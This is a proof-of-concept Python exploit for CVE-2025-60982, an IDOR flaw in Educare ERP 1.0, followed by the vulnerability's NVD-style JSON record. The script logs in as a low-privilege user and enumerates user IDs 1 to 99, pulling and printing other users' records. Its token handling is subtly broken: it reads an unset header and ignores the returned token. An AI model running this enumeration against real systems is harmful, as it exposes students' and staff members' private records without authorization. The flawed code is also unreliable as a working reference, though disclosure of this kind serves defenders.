CVE-2025-60982

import requests import json # CVE-2025-60982 IDOR PoC for Educare ERP 1.0 # Target: Educare ERP 1.0 (2025-04-22) # Vulnerability: Insecure Direct Object Reference TARGET_URL = "http://target-educare-erp.com" LOGIN_ENDPOINT = "/api/auth/login" VULNERABLE_ENDPOINT = "/api/users/{user_id}/records" def login(username, password): """Authenticate and get session token""" session = requests.Session() login_data = { "username": username, "password": password } response = session.post(f"{TARGET_URL}{LOGIN_ENDPOINT}", json=login_data) if response.status_code == 200: return session, response.json().get("token") return None, None def exploit_idor(session, target_user_id): """Exploit IDOR by manipulating object reference""" # Modify the user_id parameter to access other users' data headers = {"Authorization": f"Bearer {session.headers.get('X-Auth-Token')}"} target_url = f"{TARGET_URL}/api/users/{target_user_id}/records" response = session.get(target_url, headers=headers) if response.status_code == 200: return response.json() return None def main(): # Step 1: Login with low-privilege account session, token = login("[email protected]", "password123") if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Enumerate and access other users' data via IDOR for user_id in range(1, 100): print(f"[*] Attempting to access user ID: {user_id}") data = exploit_idor(session, user_id) if data: print(f"[+] Successfully accessed user {user_id} data:") print(json.dumps(data, indent=2)) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-60982", "sourceIdentifier": "[email protected]", "published": "2025-10-27T18:15:43.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IDOR vulnerability in Educare ERP 1.0 (2025-04-22) allows unauthorized access to sensitive data via manipulated object references. Affected endpoints do not enforce proper authorization checks, allowing authenticated users to access or modify data belonging to other users by changing object identifiers in API requests. Attackers can exploit this flaw to view or modify sensitive records without proper authorization."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Educare-IDOR.md", "source": "[email protected]"}, {"url": "https://www.educare.school/", "source": "[email protected]"}, {"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Educare-IDOR.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}